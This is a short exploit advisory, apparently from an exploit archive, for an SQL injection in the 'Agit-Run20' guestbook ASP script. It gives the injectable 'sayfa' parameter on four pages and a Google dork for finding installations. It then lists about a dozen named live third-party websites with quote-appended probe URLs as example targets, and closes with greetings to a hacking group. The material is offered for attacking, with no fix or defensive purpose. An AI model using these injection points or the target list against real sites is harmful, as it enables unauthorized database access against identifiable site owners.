##################################################################
# Exploit Title: Agit-Run20 Guestbook SQL injection
# Date: 15-04-2012
# Author: CWpisagor
# Script Download: http://www.hotscripts.com/listings/jump/download/117358
# Category:: Webapps
# Google dork: "Agit-Run20"
# Tested on: Windows 7
##################################################################
www.server.com/path/gb.asp?sayfa=[SQL]
www.server.com/path/Run20.asp?sayfa=[SQL]
www.server.com/path/default.asp?sayfa=[SQL]
www.server.com/path/defter.asp?sayfa=[SQL]
Example Site
http://www.mallepillen.dk/gb.asp?sayfa=2'
http://ankarakucukozlukoyudernegi.com/ziyaretcidefteri/Run20.asp?sayfa=6'
http://www.avlunlar.com/ziyaretcidefteri/Run20.asp?sayfa=2'
http://agitkaplan.brinkster.net/run20/default.asp?sayfa=4'
http://www.minoxil.org/yorumlar/default.asp?sayfa=3'
http://www.kankalite.com/Tr/run20/default.asp?sayfa=2'
http://www.mehmeteti.net/ziyaretci_defteri/default.asp?sayfa=2'
http://www.muratertan.com/yorumcu.asp?sayfa=58'
http://www.gumrukmuhafazahaber.com/haftaninsorusu/?sayfa=2'
http://www.suzeykoyu.com/defter.asp?sayfa=2'
http://www.kankalite.com/Tr/run20/default.asp?sayfa=3'
Thanks : Volqan , CWKaraKule , Beyaz_Sancak , Servan , Hizmetkar , Mad_Boy and Cyber-Warrior All Users